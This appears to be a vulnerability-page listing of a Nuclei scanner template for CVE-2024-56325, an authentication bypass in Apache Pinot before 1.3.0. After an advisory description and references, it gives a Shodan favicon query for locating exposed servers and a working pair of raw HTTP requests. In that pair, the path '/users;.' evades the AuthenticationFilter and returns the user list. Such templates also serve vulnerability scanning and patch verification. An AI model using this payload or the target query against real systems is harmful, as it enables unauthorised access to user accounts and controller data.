This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
PoC代码[已公开]
id: CVE-2024-56325
info:
name: Apache Pinot < 1.3.0 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
remediation: Fixed in version 1.3.0
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-25-109/
- https://github.com/advisories/GHSA-6jwp-4wvj-6597
- https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
- http://www.openwall.com/lists/oss-security/2025/03/27/8
classification:
epss-score: 0.05963
epss-percentile: 0.90304
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:1696974531
tags: cve,cve2024,apache,pinot,auth-bypass
http:
- raw:
- |
GET /users HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 403
- 401
internal: true
- raw:
- |
GET /users;. HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"users"'
- type: status
status:
- 200
- type: word
part: header
words:
- 'Pinot-Controller-'
# digest: 490a0046304402204d066e599446dba2030ad8f335548c894082f659b9789d294914bf26256ca7ca02201386739f967775698ab75b397aae9abe923dd64874873a3a14769fe015f4fd15:922c64590222798bb761d5b6d8e72950